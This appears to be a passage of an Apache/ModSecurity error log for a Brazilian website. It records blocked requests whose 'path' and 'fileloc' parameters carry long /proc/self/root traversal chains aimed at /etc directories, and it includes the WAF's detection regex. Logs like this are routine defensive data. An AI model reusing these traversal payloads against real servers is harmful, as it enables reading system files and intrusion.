[Fri Mar 20 12:18:23.711223 2026] [:error] [pid 10189:tid 140411565680384] [client 74.7.241.31:50176] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1lPzJ3M9BSuKP7CAZhRQAAAJU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:18:32.734755 2026] [:error] [pid 11642:tid 140411574073088] [client 74.7.241.31:50184] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1lSLninkcc-iUj5AqTSQAAA5Q"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:18:34.186899 2026] [:error] [pid 9818:tid 140411658000128] [client 74.7.241.31:54246] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1lSl1pVZ5mVmJwsFNmFwAAAEo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:18:42.880288 2026] [:error] [pid 7893:tid 140411699963648] [client 74.7.241.31:54256] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1lUhCii7xarUs8iHaiaQAAAgU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:18:46.693776 2026] [mime_magic:error] [pid 7235:tid 140411565680384] (70014)End of file found: [client 216.73.216.191:46412] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 12:18:46.800765 2026] [:error] [pid 7893:tid 140411733534464] [client 74.7.241.31:54256] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1lVhCii7xarUs8iHaicgAAAgE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:18:48.635963 2026] [:error] [pid 26799:tid 140411716749056] [client 57.141.18.123:46464] [client 57.141.18.123] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1lV9a6ubjKNq_cu4YUywAAA0M"]
[Fri Mar 20 12:18:48.638604 2026] [:error] [pid 7235:tid 140411607643904] [client 74.7.241.31:40690] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1lWPqxLDW4GITHUkQi4AAAARA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:18:57.579985 2026] [:error] [pid 7893:tid 140411616036608] [client 74.7.241.31:40706] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1lYRCii7xarUs8iHaikgAAAg8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:19:10.372611 2026] [mime_magic:error] [pid 26799:tid 140411674785536] (70014)End of file found: [client 57.141.18.103:47742] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 12:19:12.091711 2026] [:error] [pid 10189:tid 140411548894976] [client 57.141.18.0:47890] [client 57.141.18.0] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/networkmanager"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1lcDJ3M9BSuKP7CAZhgQAAAJc"]
[Fri Mar 20 12:19:13.231376 2026] [:error] [pid 15826:tid 140411540502272] [client 57.141.18.120:47886] [client 57.141.18.120] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1lceoXxyEfFpUF8f-3pAAAAVg"]
[Fri Mar 20 12:19:13.931605 2026] [:error] [pid 7893:tid 140411641214720] [client 74.7.241.31:40706] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1lcRCii7xarUs8iHairgAAAgw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:19:15.341981 2026] [:error] [pid 7235:tid 140411624429312] [client 74.7.241.31:50596] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1lc_qxLDW4GITHUkQi_QAAAQ4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:19:17.597701 2026] [:error] [pid 15826:tid 140411607643904] [client 74.7.243.128:34752] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1ldeoXxyEfFpUF8f-3rQAAAVA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 12:19:21.941773 2026] [mime_magic:error] [pid 7235:tid 140411699963648] (70014)End of file found: [client 57.141.18.75:48348] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 12:19:25.085786 2026] [:error] [pid 10189:tid 140411733534464] [client 74.7.241.31:50600] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1lfTJ3M9BSuKP7CAZhigAAAIE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:19:26.419403 2026] [:error] [pid 11167:tid 140411716749056] [client 74.7.241.31:40340] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1lfvHIg5MgXLBnicMsZgAAAcM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:19:26.653878 2026] [:error] [pid 11167:tid 140411725141760] [client 74.7.241.31:40340] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1lfvHIg5MgXLBnicMsZwAAAcI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:19:28.791657 2026] [:error] [pid 11167:tid 140411733534464] [client 57.141.18.84:48586] [client 57.141.18.84] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/rwtab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1lgPHIg5MgXLBnicMsdQAAAcE"]
[Fri Mar 20 12:19:29.605859 2026] [:error] [pid 11167:tid 140411666392832] [client 74.7.243.128:47048] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1lgfHIg5MgXLBnicMsfwAAAck"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 12:19:34.751445 2026] [:error] [pid 10189:tid 140411624429312] [client 57.141.18.95:48756] [client 57.141.18.95] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/dnsmasq.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1lhjJ3M9BSuKP7CAZhjwAAAI4"]
[Fri Mar 20 12:19:36.927073 2026] [:error] [pid 31215:tid 140411557287680] [client 74.7.228.61:55598] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ab1liAF0L0L-SsrnPo6gCQAAAtY"]
[Fri Mar 20 12:19:48.631917 2026] [:error] [pid 10189:tid 140411641214720] [client 74.7.243.128:41552] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1llDJ3M9BSuKP7CAZhoAAAAIw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 12:20:04.581796 2026] [mime_magic:error] [pid 15826:tid 140411683178240] (70014)End of file found: [client 57.141.18.101:49952] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 12:20:08.772096 2026] [:error] [pid 11167:tid 140411574073088] [client 74.7.241.31:56722] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1lqPHIg5MgXLBnicMsrwAAAdQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:20:11.176964 2026] [:error] [pid 11642:tid 140411691570944] [client 74.7.241.31:37922] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname 